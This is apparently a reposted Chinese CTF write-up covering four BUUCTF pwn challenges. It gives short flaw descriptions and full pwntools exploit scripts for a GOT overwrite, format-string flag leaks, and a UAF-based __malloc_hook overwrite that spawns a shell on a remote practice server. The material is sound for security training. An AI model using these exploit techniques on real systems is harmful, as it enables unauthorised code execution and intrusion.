PWN-PRACTICE-BUUCTF-28

• • wustctf2020_name_your_dog
  • judgement_mna_2016
  • gyctf_2020_some_thing_interesting
  • xman_2019_format

wustctf2020_name_your_dog

Partial RELRO，可修改got表
scanf_got距離Dogs56個字節
當index為-7時，即可改寫scanf_got為shell的地址

from pwn import * #io = process("./wustctf2020_name_your_dog") io = remote("node4.buuoj.cn",29103) shell = 0x080485CB io.sendlineafter("Name for which?\n>","-7") io.sendlineafter("Give your name plz: ",p32(shell)) io.interactive()

judgement_mna_2016

格式化字符串漏洞，找到flag在棧上的偏移為28，"%28$s"即可打印出flag

from pwn import * #io=process("./judgement_mna_2016") io=remote("node4.buuoj.cn",25668) io.recvuntil("Flag judgment system\nInput flag >> ") flag_addr=0x0804A0A0 payload="%28$s" io.sendline(payload) io.interactive()

gyctf_2020_some_thing_interesting

格式化字符串+UAF，參考：[BUUCTF]PWN——gyctf_2020_some_thing_interesting（格式化字符串+UAF）

# -*- coding:utf-8 -*- from pwn import * #io=process("./gyctf_2020_some_thing_interesting") io=remote("node4.buuoj.cn",25715) elf=ELF("./gyctf_2020_some_thing_interesting") libc=ELF("./libc-2.23-16-x64.so")def check():#格式化字符串漏洞io.sendlineafter("> Now please tell me what you want to do :","0") def add(O_len,O_content,RE_len,RE_content):io.sendlineafter("> Now please tell me what you want to do :","1")io.sendlineafter("> O's length : ",str(O_len))io.sendlineafter("> O : ",O_content)io.sendlineafter("> RE's length : ",str(RE_len))io.sendlineafter("> RE : ",RE_content) def edit(index,O_content,RE_content):io.sendlineafter("> Now please tell me what you want to do :","2")io.sendlineafter("> Oreo ID : ",str(index))io.sendlineafter("> O : ",O_content)io.sendlineafter("> RE : ",RE_content) def free(index):#UAFio.sendlineafter("> Now please tell me what you want to do :","3")io.sendlineafter("> Oreo ID : ",str(index)) def show(index):io.sendlineafter("> Now please tell me what you want to do :","4")io.sendlineafter("> Oreo ID : ",str(index)) def exit():io.sendlineafter("> Now please tell me what you want to do :","5")#gdb.attach(io) #pause()code="OreOOrereOOreO" #len_code=14 payload=code+"%17$p" io.sendlineafter("> Input your code please:",payload) check() io.recvuntil("# Your Code is "+code+"0x") __libc_start_main=int(io.recvuntil("\n")[:-1],16)-240 libc_base=__libc_start_main-libc.sym["__libc_start_main"] print("libc_base=="+hex(libc_base)) malloc_hook=libc_base+libc.sym["__malloc_hook"] ones=[0x45216,0x4526a,0xf02a4,0xf1147] onegadget=libc_base+ones[3]#pause()add(0x68,"aaaa",0x68,"bbbb") free(1)#pause()edit(1,p64(0),p64(malloc_hook-0x23))#pause()payload="d"*0x13+p64(onegadget) add(0x68,"cccc",0x68,payload)#pause()io.sendlineafter("> Now please tell me what you want to do :","1") io.sendlineafter("> O's length : ",str(0x10))io.interactive()

xman_2019_format

堆上的格式化字符串漏洞，參考：BUU-xman_2019_format-WP

# -*- coding:utf-8 -*- #from pwn import * #context.log_level="debug" shell=0x080485AB io=remote("node4.buuoj.cn",29724) #io=process("./xman_2019_format") addr=0x9c payload="%"+str(addr)+"c%10$hhn"+"|" payload+="%"+str(shell&0xffff)+"c%18$hn" io.sendline(payload) io.sendline("cat flag") io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-28的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。